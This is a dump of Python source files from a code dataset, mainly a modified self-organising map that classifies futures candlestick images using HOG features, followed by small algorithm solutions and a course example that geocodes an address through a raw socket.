'\\r [ {s:{d}} / {m} ] {s:3.0f}% - ? it/s'\n progress = progress.format(m=m, d=digits, s=0)\n stdout.write(progress)\n beginning = time()\n stdout.write(progress)\n for i, it in enumerate(iterations):\n yield it\n sec_left = ((m-i+1) * (time() - beginning)) / (i+1)\n time_left = str(timedelta(seconds=sec_left))[:7]\n progress = '\\r [ {i:{d}} / {m} ]'.format(i=i+1, d=digits, m=m)\n progress += ' {p:3.0f}%'.format(p=100*(i+1)/m)\n progress += ' - {time_left} left '.format(time_left=time_left)\n stdout.write(progress)\n\n\ndef fast_norm(x):\n \"\"\"Returns norm-2 of a 1-D numpy array.\n\n * faster than linalg.norm in case of 1-D arrays (numpy 1.9.2rc1).\n \"\"\"\n return sqrt(dot(x, x.T))\n\n\ndef asymptotic_decay(learning_rate, t, max_iter):\n \"\"\"Decay function of the learning process.\n Parameters\n ----------\n learning_rate : float\n current learning rate.\n\n t : int\n current iteration.\n\n max_iter : int\n maximum number of iterations for the training.\n \"\"\"\n #return learning_rate / (1+t/(max_iter/2))原函数,此处做了更改\n decay = 0.49*(1-t/max_iter)+0.01 #值最小是0.01,初始学习率是0.5\n return decay\n\n\nclass MiniSom(object):\n def __init__(self,traindata, x, y, input_len,kernel,stride, Epsilon,sigma=1.0, learning_rate=0.5,\n decay_function=asymptotic_decay,\n neighborhood_function='gaussian', topology='rectangular',\n activation_distance='euclidean', random_seed=None):\n \"\"\"Initializes a Self Organizing Maps.\n\n A rule of thumb to set the size of the grid for a dimensionality\n reduction task is that it should contain 5*sqrt(N) neurons\n where N is the number of samples in the dataset to analyze.\n\n E.g. if your dataset has 150 samples, 5*sqrt(150) = 61.23\n hence a map 8-by-8 should perform well.\n\n Parameters\n ----------\n x : int\n x dimension of the SOM.\n\n y : int\n y dimension of the SOM.\n\n input_len : int\n Number of the elements of the vectors in input.\n\n sigma : float, optional (default=1.0)\n Spread of the neighborhood function, needs to be adequate\n to the dimensions of the map.\n (at the iteration t we have sigma(t) = sigma / (1 + t/T)\n where T is #num_iteration/2)\n learning_rate : initial learning rate\n (at the iteration t we have\n learning_rate(t) = learning_rate / (1 + t/T)\n where T is #num_iteration/2)\n\n decay_function : function (default=None)\n Function that reduces learning_rate and sigma at each iteration\n the default function is:\n learning_rate / (1+t/(max_iterarations/2))\n\n A custom decay function will need to to take in input\n three parameters in the following order:\n\n 1. learning rate\n 2. current iteration\n 3. maximum number of iterations allowed\n\n\n Note that if a lambda function is used to define the decay\n MiniSom will not be pickable anymore.\n\n neighborhood_function : string, optional (default='gaussian')\n Function that weights the neighborhood of a position in the map.\n Possible values: 'gaussian', 'mexican_hat', 'bubble', 'triangle'\n\n topology : string, optional (default='rectangular')\n Topology of the map.\n Possible values: 'rectangular', 'hexagonal'\n\n activation_distance : string, optional (default='euclidean')\n Distance used to activate the map.\n Possible values: 'euclidean', 'cosine', 'manhattan', 'chebyshev'\n\n random_seed : int, optional (default=None)\n Random seed to use.\n \"\"\"\n if sigma >= x or sigma >= y:\n warn('Warning: sigma is too high for the dimension of the map.')\n\n self._random_generator = random.RandomState(random_seed) #生成符合正态分布的随机数[0,1]\n self._learning_rate = learning_rate #初始学习率\n self._sigma = sigma #邻域函数初始值为1,代表100%覆盖,迭代的过程中,sigma的值会随迭代次数不断减小,sigma(t) = sigma / (1 + t/T)\n self._input_len = input_len #输入向量的维度,也是权值的维度\n # random initialization\n self._weights = self._random_generator.rand(x, y, input_len)*2-1 #生成符合正态分布的权重矩阵\n self._weights /= linalg.norm(self._weights, axis=-1, keepdims=True) #权值标准化,linalg.norm求范数,默认是二范数,axis=-1,按行向量求范数,keepdims保持二维特性\n\n self._activation_map = zeros((x, y)) #生成和网络一样大小的零矩阵,用来记录\n self._neigx = arange(x) #得到一个列表[0,1,...,x-1]\n self._neigy = arange(y) # 用来求邻域函数矩阵的值\n\n if topology not in ['hexagonal', 'rectangular']: #判断是蜂窝网络还是矩阵网络\n msg = '%s not supported only hexagonal and rectangular available'\n raise ValueError(msg % topology)\n self.topology = topology #确定网络属性\n self._xx, self._yy = meshgrid(self._neigx, self._neigy) #生成网络坐标矩阵\n self._xx = self._xx.astype(float) #坐标类型转换成浮点型\n self._yy = self._yy.astype(float)\n if topology == 'hexagonal':\n self._xx[::-2] -= 0.5\n if neighborhood_function in ['triangle']:\n warn('triangle neighborhood function does not ' +\n 'take in account hexagonal topology')\n\n self._decay_function = decay_function #学习率递减函数,learning_rate / (1+t/(max_iter/2))\n\n neig_functions = {'gaussian': self._gaussian,\n }\n\n if neighborhood_function not in neig_functions:\n msg = '%s not supported. Functions available: %s'\n raise ValueError(msg % (neighborhood_function,\n ', '.join(neig_functions.keys())))\n\n if neighborhood_function in ['triangle',\n 'bubble'] and (divmod(sigma, 1)[1] != 0\n or sigma < 1):\n warn('sigma should be an integer >=1 when triangle or bubble' +\n 'are used as neighborhood function')\n\n self.neighborhood = neig_functions[neighborhood_function] #确定领域函数\n\n distance_functions = {'euclidean': self._euclidean_distance,\n }\n\n if activation_distance not in distance_functions:\n msg = '%s not supported. Distances available: %s'\n raise ValueError(msg % (activation_distance,\n ', '.join(distance_functions.keys())))\n\n self._activation_distance = distance_functions[activation_distance] #相似度计算函数,一般采用欧氏距离,这里如果采用模糊的话,要在这里更改,添加一个Fuzzy距离函数\n self.kernel = kernel # 是一个滑动窗口的尺寸,如[3,3]\n self.stride = stride # 滑动窗口的步长\n self.Epsilon = Epsilon # 模糊训练截止的条件\n self.w_distance = 100 #记录权值的变化大小,用于终止训练\n self.spldata = [] # 里面是以图片为单位的data\n self.allfeature = [] # 里面是所有图片的所有特征,用于初始化权重和获取训练误差\n self.traindata = traindata\n self.processdata(self.traindata)\n self.x = x\n self.y = y\n\n def _activate(self, x): #x是一个输入向量\n \"\"\"Updates matrix activation_map, in this matrix\n the element i,j is the response of the neuron i,j to x.\"\"\"\n self._activation_map = self._activation_distance(x, self._weights) #得到的是x到每个w的距离矩阵\n\n def activate(self, x):\n \"\"\"Returns the activation map to x.\"\"\"\n self._activate(x)\n return self._activation_map #得到x和每个向量的距离矩阵\n\n\n\n def _euclidean_distance(self, x, w): #欧式距离公式√∑(xi﹣wi)²\n return linalg.norm(subtract(x, w), axis=-1) #返回的是距离矩阵\n\n def _check_input_len(self, data):\n \"\"\"Checks that the data in input is of the correct shape.\"\"\"\n data_len = self._input_len#self.kernel[0]*self.kernel[1]\n if self._input_len != data_len:\n msg = 'Received %d features, expected %d.' % (data_len,\n self._input_len)\n raise ValueError(msg)\n\n def _gaussian(self, c, sigma): # 高斯核函数f(x) = e^[-(x-b)²]/2c\n \"\"\"Returns a Gaussian centered in c.\"\"\"\n \"\"\"f(x)=ae^[-(x-b)²]/2c²\n a=1/sigma√2PI\"\"\"\n # c是坐标[x,y]\n # c是坐标(x,y)这里是二维高斯函数 f(x) = e^[-[ (x-x0)²/2sigma + (y-y0)²/2sigma ]]=e^[-[ (x-x0)²/2sigma]] * e^[-[ (y-y0)²/2sigma ]]\n d = 2 * pi * sigma * sigma # 圆面积pi*r*r\n ax = exp(-power(self._xx - self._xx.T[c], 2) / d) # power(x,y)函数,返回X的y次方,y可以是数组或者数字 e^[-[ (x-x0)²/2sigma]]\n ay = exp(-power(self._yy - self._yy.T[c], 2) / d) # e^[-[ (y-y0)²/2sigma ]]\n # 这里是二维高斯函数 f(x) = e^[-[ (x-x0)²/2sigma + (y-y0)²/2sigma ]]=e^[-[ (x-x0)²/2sigma]] * e^[-[ (y-y0)²/2sigma ]]\n # print(\"neiborhood function\",(ax * ay).T)\n return (ax * ay).T # the external product gives a matrix 外部积得到一个矩阵,元素对应相乘\n def _triangle(self, c, sigma):\n \"\"\"Triangular function centered in c with spread sigma.\"\"\"\n triangle_x = (-abs(c[0] - self._neigx)) + sigma\n triangle_y = (-abs(c[1] - self._neigy)) + sigma\n triangle_x[triangle_x < 0] = 0.\n triangle_y[triangle_y < 0] = 0.\n return outer(triangle_x, triangle_y)\n def winner(self, x):\n \"\"\"Computes the coordinates of the winning neuron for the sample x.\"\"\"\n self._activate(x) #self._activation_map = self._activation_distance(x, self._weights) #得到的是x到每个w的距离矩阵\n return unravel_index(self._activation_map.argmin(),\n self._activation_map.shape) #找到最小的值,返回坐标[x,y]\n\n\n def quantization(self, data):\n \"\"\"Assigns a code book (weights vector of the winning neuron)\n to each sample in data.\"\"\"\n self._check_input_len(data)\n winners_coords = argmin(self._distance_from_weights(data), axis=1)\n return self._weights[unravel_index(winners_coords,\n self._weights.shape[:2])]\n\n def forecast_weights_init(self,filename):\n \"\"\"Initializes the weights of the SOM\n picking random samples from data.\"\"\"\n #读取训练好的权值\n self._weights = np.load(filename)\n\n def processdata(self, data):\n for iteration in data:\n # 这里要先对数据提取特征,一个iteration中包含3个数组,存储rgb色彩\n features = self.FeatureExtraction(iteration)\n self.spldata.append(features) # 以图片为单位,存储特征\n self.allfeature.extend(features) # 没有单位,只存储特征\n def kernel_random_weights_init(self):\n \"\"\"Initializes the weights of the SOM\n picking random samples from data.\"\"\"\n #从数据中随机选取数据作为权值\n\n self._check_input_len(self.allfeature)\n it = nditer(self._activation_map, flags=['multi_index'])\n while not it.finished:\n rand_i = self._random_generator.randint(len(self.allfeature))\n self._weights[it.multi_index] = self.allfeature[rand_i]\n it.iternext()\n\n # 自己编写,用滑动窗口提取矩阵特征作为输入\n def FeatureExtraction(self, matrixs): # matrix是灰度图像向量\n features = []\n for matrix in matrixs:\n # matrix = np.array(matrix)\n row, loc = matrix.shape\n # matrix = matrix.reshape(row,loc)\n for i in range(0, row - self.kernel[0] + 1, self.stride):\n for j in range(0, loc - self.kernel[1] + 1, self.stride):\n feature = [] # 特征\n for m in range(self.kernel[0]):\n for n in range(self.kernel[1]):\n pixel = matrix[i + m][j + n]\n feature.extend([pixel])\n\n # 这里加入hog,计算梯度直方图\n # 在这里设置参数\n image = np.array(feature).reshape(self.kernel[0], self.kernel[1])\n size = tuple(self.kernel)\n winSize = size\n blockSize = size\n blockStride = (1, 1) # None#(1,1)\n cellSize = size\n nbins = self._input_len # 9\n # 定义对象hog,同时输入定义的参数,剩下的默认即可\n hog = cv2.HOGDescriptor(winSize, blockSize, blockStride, cellSize, nbins)\n winStride = None # (1,1)\n # padding = (8,8) , padding , winStride\n image = np.uint8(image * 255)\n hog_result = hog.compute(image).reshape(-1, )\n print(\"hog_reault\", hog_result)\n features.append(np.array(hog_result))\n # print(\"梯度直方图\",hog_result)\n # print(\"features\",features)\n # print(\"features长度\",len(features))\n return features # 返回数组,是一张图片的所有特征\n\n\n def distance_map(self):\n \"\"\"Returns the distance map of the weights.\n Each cell is the normalised sum of the distances between\n a neuron and its neighbours. Note that this method uses\n the euclidean distance.\"\"\"\n #返回权值之间的距离矩阵\n um = zeros((self._weights.shape[0],\n self._weights.shape[1],\n 8)) # 2 spots more for hexagonal topology\n\n ii = [[0, -1, -1, -1, 0, 1, 1, 1]]*2\n jj = [[-1, -1, 0, 1, 1, 1, 0, -1]]*2\n\n if self.topology == 'hexagonal':\n ii = [[1, 1, 1, 0, -1, 0], [0, 1, 0, -1, -1, -1]]\n jj = [[1, 0, -1, -1, 0, 1], [1, 0, -1, -1, 0, 1]]\n\n for x in range(self._weights.shape[0]):\n for y in range(self._weights.shape[1]):\n w_2 = self._weights[x, y]\n e = y % 2 == 0 # only used on hexagonal topology\n for k, (i, j) in enumerate(zip(ii[e], jj[e])):\n if (x+i >= 0 and x+i < self._weights.shape[0] and\n y+j >= 0 and y+j < self._weights.shape[1]):\n w_1 = self._weights[x+i, y+j]\n um[x, y, k] = fast_norm(w_2-w_1)\n\n um = um.sum(axis=2)\n return um/um.max()\n\n def activation_response(self, data):\n \"\"\"\n Returns a matrix where the element i,j is the number of times\n that the neuron i,j have been winner.\n \"\"\"\n self._check_input_len(data)\n a = zeros((self._weights.shape[0], self._weights.shape[1]))\n for x in data:\n a[self.winner(x)] += 1\n return a\n\n def _distance_from_weights(self, data):\n \"\"\"Returns a matrix d where d[i,j] is the euclidean distance between\n data[i] and the j-th weight.\n \"\"\"\n input_data = array(data)\n weights_flat = self._weights.reshape(-1, self._weights.shape[2])\n input_data_sq = power(input_data, 2).sum(axis=1, keepdims=True)\n weights_flat_sq = power(weights_flat, 2).sum(axis=1, keepdims=True)\n cross_term = dot(input_data, weights_flat.T)\n return sqrt(-2 * cross_term + input_data_sq + weights_flat_sq.T)\n\n def quantization_error(self, data):\n \"\"\"Returns the quantization error computed as the average\n distance between each input sample and its best matching unit.\"\"\"\n self._check_input_len(data)\n return norm(data-self.quantization(data), axis=1).mean()\n\n def topographic_error(self, data):\n \"\"\"Returns the topographic error computed by finding\n the best-matching and second-best-matching neuron in the map\n for each input and then evaluating the positions.\n\n A sample for which these two nodes are not ajacent conunts as\n an error. The topographic error is given by the\n the total number of errors divided by the total of samples.\n\n If the topographic error is 0, no error occurred.\n If 1, the topology was not preserved for any of the samples.\"\"\"\n self._check_input_len(data)\n if self.topology == 'hexagonal':\n msg = 'Topographic error not implemented for hexagonal topology.'\n raise NotImplementedError(msg)\n total_neurons = prod(self._activation_map.shape)\n if total_neurons == 1:\n warn('The topographic error is not defined for a 1-by-1 map.')\n return nan\n\n t = 1.42\n # b2mu: best 2 matching units\n b2mu_inds = argsort(self._distance_from_weights(data), axis=1)[:, :2]\n b2my_xy = unravel_index(b2mu_inds, self._weights.shape[:2])\n b2mu_x, b2mu_y = b2my_xy[0], b2my_xy[1]\n dxdy = hstack([diff(b2mu_x), diff(b2mu_y)])\n distance = norm(dxdy, axis=1)\n return (distance > t).mean()\n\n def win_map(self, data):\n \"\"\"Returns a dictionary wm where wm[(i,j)] is a list\n with all the patterns that have been mapped in the position i,j.\"\"\"\n self._check_input_len(data)\n winmap = defaultdict(list)\n for x in data:\n winmap[self.winner(x)].append(x)\n return winmap\n\n def Forecast(self, random_order=False, verbose=False):\n \"\"\"forecast\n\n Parameters\n ----------\n verbose : bool (default=False)\n If True the status of the training\n will be printed at each iteration.\n \"\"\"\n\n ''' \n 1、迭代w,计算每个x与w的距离关系,得到隶属度\n 2、更新w,直到稳定\n 3、找到每个X对应的获胜神经元,并记录\n '''\n #迭代完成后,计算位置特征映射\n features_map=[] #存储所有图片获胜神经元的坐标列表\n if random_order:\n random_generator = self._random_generator\n for pic in self.spldata: #迭代数据\n #这里要先对数据提取特征\n feature_map = [] # 存储一张图片的所有特征对应的获胜节点,用于下一层映射\n for feature in pic: #迭代每一张图片涵盖的特征\n win = self.winner(feature)\n num =win[0]*self.y+win[1] #以坐标加和的方式记录特征\n feature_map.extend([int(num)])\n #print(\"获胜神经元的坐标映射\",feature_map)\n features_map.append(feature_map)#存储这张图片的特征对应的获胜神经元\n if verbose:\n print('\\n quantization error:', self.quantization_error(self.allfeature))\n return array(features_map)\n\nclass back_propagation:\n def __init__(self,modelname):\n\n self.model = tf.keras.models.load_model(str(modelname)) # 初始化模型\n def forcast(self,test_x,test_y):\n test_x = np.array(test_x).reshape(1,-1)\n test_y = np.array(test_y).reshape(1,-1)\n acc = self.model.evaluate(test_x,test_y)\n predict_x = self.model.predict(test_x)\n return acc,predict_x\n\n#以下内容是自己编写\n\ndef classify(som,data,winmap):\n from numpy import sum as npsum\n default_class = npsum(list(winmap.values())).most_common()[0][0]\n result = []\n for d in data:\n win_position = som.winner(d)\n if win_position in winmap:\n result.append(winmap[win_position].most_common()[0][0])\n else:\n result.append(default_class)\n return result\n\ndef integrate(firstfeaturesmap,secondfeaturesmap):\n #先将两个特征进行归一化\n normfeature = MinMaxScaler()\n firstfeature = firstfeaturesmap.shape\n secondfeature = secondfeaturesmap.shape\n firstfeaturesmap = normfeature.fit_transform(firstfeaturesmap.reshape(-1, 1))\n firstfeaturesmap = firstfeaturesmap.reshape(firstfeature)\n secondfeaturesmap = normfeature.fit_transform(secondfeaturesmap.reshape(-1, 1))\n secondfeaturesmap = secondfeaturesmap.reshape(secondfeature)\n #整合特征\n featuresmap = []\n x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12,13,14,15,16,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50]\n x = list(map(lambda num: num * num, x))\n lg = len(firstfeaturesmap[0]) + len(secondfeaturesmap[0])\n print(len(firstfeaturesmap[0]))\n print(len(secondfeaturesmap[0]))\n print(\"属性值\",lg)\n if lg>max(x):\n print(\"属性过多\")\n x = list(map(lambda num: num-lg , x))\n temp = []\n for i in range(len(x)):\n if x[i] >= 0:\n temp.extend([x[i]])\n print(\"min(temp)\",min(temp))\n zo = np.zeros([min(temp)])\n zo = list(zo)\n for i in range(len(firstfeaturesmap)):\n tempmap = []\n tempmap.extend(firstfeaturesmap[i])\n tempmap.extend(secondfeaturesmap[i])\n tempmap.extend(zo)\n l = int(pow(len(tempmap), 0.5))\n tempmap = np.array(tempmap).reshape(l,l)\n featuresmap.append([tempmap]) #som中多了一个遍历,rgb图像有三个矩阵,所以加了一个[]\n # if not isinstance(pow(len(featuresmap[0]),0.5),int): #这里输出的是浮点型\n # print(\"列表填充有误\")\n #print(\"featuresmap[0][0][0]\",featuresmap[0][0][0])\n #print(\"int(pow(len(featuresmap[0][0]),0.5))\",int(pow(len(featuresmap[0][0][0]),0.5)))\n print(\"kenel维度\",l)\n return featuresmap,l # int(pow(len(featuresmap[0][0]),0.5))\n\n\n\ndef vec2matrix2vec(vector):\n '''将向量的变化趋势映射到矩阵中\n 先找到向量元素对应的每个向量,将这些行向量组成矩阵后经过转置就是变化图'''\n vector = pre.minmax_scale(vector)\n matrix=[]\n for i in range(len(vector)):\n temp=[]\n location=vector[i]//0.1\n #print(location)\n for j in range(len(vector)):\n if j==location:\n temp.append(1.0) #1.0代表占位,也可以是vector[i]\n else:\n temp.append(0)\n matrix.append(temp) #转置之后才是上涨形态\n matrix = np.array(matrix).T\n vec = matrix.reshape(-1)\n #print(list(vec))\n #return np.mat(matrix)\n return vec\n\ndef statistics(origin, predicted):\n #compute RMSE\n from sklearn.metrics import mean_squared_error\n mse = mean_squared_error(origin, predicted)#均方误差,\n rmse = np.sqrt(mse)\n mape = (sum(abs(origin - predicted))) / len(origin)\n return mse, rmse, mape\n\n# normalize data set into [0, 1] or [-1, 1]\ndef normalize(ori_data, flag='01'):\n data = ori_data.copy()\n minV = np.min(data)\n maxV = np.max(data)\n if np.abs(maxV - minV) > 0.00001:\n data = 2 * (data - minV) / (maxV - minV) - 1\n return data, maxV, minV\n# re-normalize data set from [0, 1] or [-1, 1] into its true dimension\ndef re_normalize(ori_data, maxV, minV, flag='01'):\n data = ori_data.copy()\n if np.abs(maxV - minV) > 0.00001:\n if flag == '01': # normalize to [0, 1]\n data = data * (maxV - minV) + minV\n else:\n data = (data + 1) * (maxV - minV) / 2 + minV\n return data\n\n#处理数据\ndef processdata(way):\n data = pd.DataFrame(pd.read_csv(way, header=0))\n norm = MinMaxScaler() # 为了归一化数据\n arrdata = np.array(data)\n # datetemp = list(arrdata[:, 0])\n # date = list(set(datetemp))\n # date.sort(key=datetemp.index) # 集合数据按照原来顺序进行排序\n # 将所有数据按照30分钟进行切分,一天四个小时,240分钟\n list_data = []\n for i in range(0, len(data), 30):\n list_data.append(arrdata[i:i + 30, :]) # 数据的日期、时间、开、高、低、收、成交量、成交额\n # print(len(list_data))\n results = []\n # 切分的数据按照十个30分钟一组垂直组合\n for j in range(len(list_data) - 11):\n r = np.zeros([100, 10]) # 下跌,一行代表0.01\n g = np.zeros([100, 10]) # 上涨\n b = np.zeros([100, 10]) # 成交量\n # if j >= 10:\n # break\n temp = np.concatenate((list_data[j], list_data[j + 1], list_data[j + 2], list_data[j + 3], list_data[j + 4],\n list_data[j + 5], list_data[j + 6], list_data[j + 7], list_data[j + 8],\n list_data[j + 9]), axis=0) # 共10天,垂直组合\n # 组合后,归一化价格,绘制图像\n price = np.array(temp[:, 3:7], dtype='float')\n volume = np.array(temp[:, 7], dtype='int')\n # 这里放的十天的数据\n norm_price = norm.fit_transform(price.reshape(-1, 1)) # 归一化价格\n norm_volume = norm.fit_transform(volume.reshape(-1, 1)) # 归一化成交量\n norm_price = norm_price.reshape(-1, 4)\n # 切分归一化后的价格\n days_normprice = []\n days_normvolume = []\n days_volume = []\n for k in range(0, len(norm_price), 30):\n days_normprice.append(norm_price[k:k + 30, :])\n days_normvolume.append(norm_volume[k:k + 30, :])\n days_volume.append(volume[k:k + 30])\n # 按天绘制图像\n for l in range(len(days_normprice)):\n norm_open = float(days_normprice[l][0, 0]) # 开盘价\n norm_close = float(days_normprice[l][-1, 3]) # 收盘价\n norm_high = float(max(days_normprice[l][:, 1])) # 最高价\n norm_low = float(min(days_normprice[l][:, 2])) # 最低价\n print('open', norm_open, 'high', norm_high, 'low', norm_low, 'close', norm_close)\n loc_open = round(norm_open / 0.01) # 开盘价的位置 ,四舍五入\n loc_high = round(norm_high / 0.01) # 开盘价的位置\n loc_low = round(norm_low / 0.01) # 开盘价的位置\n loc_close = round(norm_close / 0.01) # 开盘价的位置\n body = loc_close - loc_open\n upper_shadow = loc_high - max([loc_open, loc_close])\n lower_shadow = min(loc_open, loc_close) - loc_low\n if loc_close == 100:\n loc_close = 99\n if loc_high == 100:\n loc_high = 99\n if loc_open == 100:\n loc_open = 99\n if loc_low == 100:\n loc_low = 99\n print('body', body, \"upper_shadow\", upper_shadow, \"lower_shadow\", lower_shadow)\n if body >= 0: # 上涨,g矩阵改变\n g[loc_close:loc_high, l] = 0.5 # 上影线\n g[loc_open:loc_close, l] = 1 # 实体\n g[loc_low:loc_open, l] = 0.5 # 下影线\n if loc_open == loc_close:\n g[loc_open, l] = 1 # 实体\n # print(\"g\",g)\n else: # 下跌,body<0\n r[loc_open:loc_high, l] = 0.5 # 上影线\n r[loc_close:loc_open, l] = 1 # 实体\n r[loc_low:loc_close, l] = 0.5 # 下影线\n if loc_open == loc_close:\n r[loc_open, l] = 1 # 实体\n # print(\"r\", r)\n # 成交量改变b矩阵\n for m in range(len(days_normprice[l])):\n begin_loc = int(round(days_normprice[l][m, 2] / 0.01))\n end_loc = int(round(days_normprice[l][m, 1] / 0.01))\n if begin_loc == 100:\n begin_loc=99\n if end_loc == 100:\n end_loc = 99\n # now_volume = days_normvolume[l][m]\n now_volume = days_volume[l][m]\n length = end_loc - begin_loc\n if length ==0:\n b[begin_loc, l] = round(now_volume / 1) + b[begin_loc,l]\n else:\n b[begin_loc:end_loc, l] = round(now_volume / length) + b[begin_loc:end_loc, l] # 这一价格区间的成交量被均匀分布在这一区间\n # print('b',b)\n #print(\"最大成交量\", max(max(b.reshape(1, -1))))\n b = norm.fit_transform(b.reshape(-1, 1)) # 归一化成交量\n b = b.reshape(100, 10)\n results.append([r,g,b])\n return results\ndef get_bpdata(path,loc,classies):\n norm = MinMaxScaler()\n data = pd.DataFrame(pd.read_csv(path, header=None))\n arrdata = np.array(data)\n print(arrdata[loc])\n maxV = max(np.array(arrdata[:,2:6]).reshape(-1,1))\n minV = min(np.array(arrdata[:,2:6]).reshape(-1,1))\n normarrdata = norm.fit_transform(arrdata[:,2:6])\n adata = []\n alable = []\n normadata = []\n normlable = []\n if len(classies) == 1: # len(arrdata)-11:\n for z in range(2, 6):\n for y in range(10):\n adata.extend([arrdata[loc + y][z]])\n normadata.extend([normarrdata[loc + y][z-2]])\n alable.extend([arrdata[loc + 11][z]])\n normlable.extend([normarrdata[loc + 11][z-2]])\n else:\n print(\"classiss长度不为1,结果为\",classies)\n return adata,normadata, alable, normlable,maxV,minV\n#记录训练后的数据分类结果\ndef save_data(classies,way2):\n csvFile = \"Traindatalocation.csv\"\n data = pd.DataFrame(pd.read_csv(way2,header=None))\n arrdata = np.array(data)\n arralldata = []\n if len(classies)==len(arrdata)-11:\n for x in range(len(arrdata)-11):\n temp = []\n for z in range(2,6):\n for y in range(10):\n temp.extend([arrdata[x+y][z]])\n #lable\n # temp.extend([arrdata[x+11][2]])\n # temp.extend([arrdata[x + 11][3]])\n # temp.extend([arrdata[x + 11][4]])\n temp.extend([arrdata[x + 11][5]]) #只保留了收盘价\n #temp.append([arrdata[x+11][2],arrdata[x+11][3],arrdata[x+11][4],arrdata[x+11][5]])\n temp.append(int(classies[x][0]))\n #记录数据\n with open(csvFile, 'a', newline='') as f: # 条件满足,记录数据\n csv.writer(f).writerow(temp)\n f.close()\n else:\n print(\"分类长度不对\")\n print(\"len(classies)\",len(classies))\n print(\"len(arrdata)\",len(arrdata))\ndef main():\n #EDSOM\n np.set_printoptions(suppress=True)\n count = 0\n way = \"F:\\论文实验\\FEDSOMRGBHOGfutures3\\mintraintest\"\n arralldata = processdata(way) # 已经归一化后的rgb矩阵feature\n # 这里是rgb矩阵\n vec = arralldata #里面有三个矩阵[r,g,b]\n Epsilon = 0.05 #用不到了\n som1 = MiniSom(vec,15, 15, 9,[10,10],1, Epsilon,sigma=3, learning_rate=0.5)\n som1.forecast_weights_init('som1w.npy')\n firstfeaturesmap = som1.Forecast(verbose=False) #返回特征\n\n som2 = MiniSom(vec,15, 15, 9, [8, 8], 1, Epsilon,sigma=3, learning_rate=0.5)\n som2.forecast_weights_init('som2w.npy')\n secondfeaturesmap = som2.Forecast(verbose=False) #返回特征\n\n featuresmap,l = integrate(firstfeaturesmap,secondfeaturesmap) #整合两个特征\n featuresmap = array(featuresmap) #输入为数组形式,整合前两层训练结果\n #print(\"featuresmap\",featuresmap)\n som3 = MiniSom(featuresmap,8, 8, 9,[l,l],1, Epsilon,sigma=3, learning_rate=0.5)\n som3.forecast_weights_init('som3w.npy')\n classies = som3.Forecast(verbose=False)#输入的是映射,没有经过归一化\n\n print(\"len(classies)\", len(classies))\n way2 = \"F:\\论文实验\\FEDSOMRGBHOGfutures3\\daytraintest\" # 存放的30min数据\n # 保存数据\n save_data(classies, way2)\n\n\n\nif __name__==\"__main__\":\n main()","sub_path":"computeloc.py","file_name":"computeloc.py","file_ext":"py","file_size_in_byte":33886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"424566815","text":"from sys import stdin\n# stdin = open('input.txt', 'r')\ninput = stdin.readline\n\nn = int(input())\nfor _ in range(n):\n rs = []\n ls = []\n s = input().rstrip()\n for i in s:\n if i == \"<\":\n if ls:\n rs.append(ls.pop())\n elif i == \">\":\n if rs:\n ls.append(rs.pop())\n elif i == \"-\":\n if ls:\n ls.pop()\n else:\n ls.append(i)\n print(\"\".join(ls), end=\"\")\n print(\"\".join(reversed(rs)))","sub_path":"210613/5397.py","file_name":"5397.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"104958369","text":"# -*- coding:utf-8 -*-\r\n# Author: washing\r\n# DateTime: 2020/9/5 18:56\r\n# File: 0470.py\r\n# Desc: \r\n\r\nclass Solution:\r\n def findMaxForm(self, strs: List[str], m: int, n: int) -> int:\r\n def num_counter(strs):\r\n num01 = []\r\n num01.append(strs.count(\"0\"))\r\n num01.append(strs.count(\"1\"))\r\n return num01\r\n\r\n dp = []\r\n for i in range(m+1):\r\n dp.append([0]*(n+1))\r\n length = len(strs)\r\n for i in range(length):\r\n num01 = num_counter(strs[i])\r\n num0 = num01[0]\r\n num1 = num01[1]\r\n for j in range(m, num0-1, -1):\r\n for k in range(n, num1-1, -1):\r\n dp[j][k] = max(dp[j][k], dp[j-num0][k-num1]+1)\r\n return dp[m][n]\r\n\r\n","sub_path":"Solutions/0470/0470.py","file_name":"0470.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"496575321","text":"\"\"\"\n Uses sockets to retrieve raw data from google maps. Last 5 lines\n parse the raw response, extract the HTTP body from the HTTP response,\n parse it, and display the name of the first result.\n\"\"\"\nimport json\nimport socket\nfrom urllib.parse import quote_plus\nfrom io import StringIO\n\nrequest_str = \"\"\"\\\nGET /arcgis/rest/services/World/GeocodeServer/find?f=json&text={0}&maxLocations=1 HTTP/1.1\\r\\n\\\nHost: geocode.arcgis.com:80\\r\\n\\\nUser-Agent: 12_socket_geocode.py\\r\\n\\\nConnection: close\\r\\n\\\n\\r\\n\\\n\"\"\"\n\naddress = 'Walt Disney World, Lake Buena Vista, FL'\n\nsock = socket.socket()\nsock.connect(('geocode.arcgis.com', 80))\n\nrequest = request_str.format(quote_plus(address))\nsock.sendall(request.encode('ascii'))\nresponse = []\nwhile True:\n data = sock.recv(4096)\n if not data:\n break\n response.append(data)\n\nresponse_str = b''.join(response).decode()\nprint('Raw response\\n', response_str)\n\nresponse_lines = StringIO(response_str).readlines()\nfor count, line in enumerate(response_lines):\n if len(line.strip()) == 0:\n json_response = response_lines[count+1:]\n break\n\ngeo_object = json.loads(''.join(json_response))\ngeo_object = geo_object.get('locations', [{}])[0]\nprint(geo_object.get('name', 'addr not found'))","sub_path":"Optum Tech/IN1468 available until 12-31-20/IN1468_student_files/student_files/ch04_network_prog/12_socket_geocode.py","file_name":"12_socket_geocode.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"443370036","text":"class Solution:\n '''\n Slding Window\n '''\n def longestOnes(self, nums: List[int], k: int) -> int:\n start, result = 0, 0\n for i in range(len(nums)):\n if nums[i] == 0:\n k -= 1\n while k < 0:\n if nums[start] == 0:\n k += 1\n start += 1\n result = max(result, i-start+1)\n return result","sub_path":"1004.MaxConsecutiveOnesIII.py","file_name":"1004.MaxConsecutiveOnesIII.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} 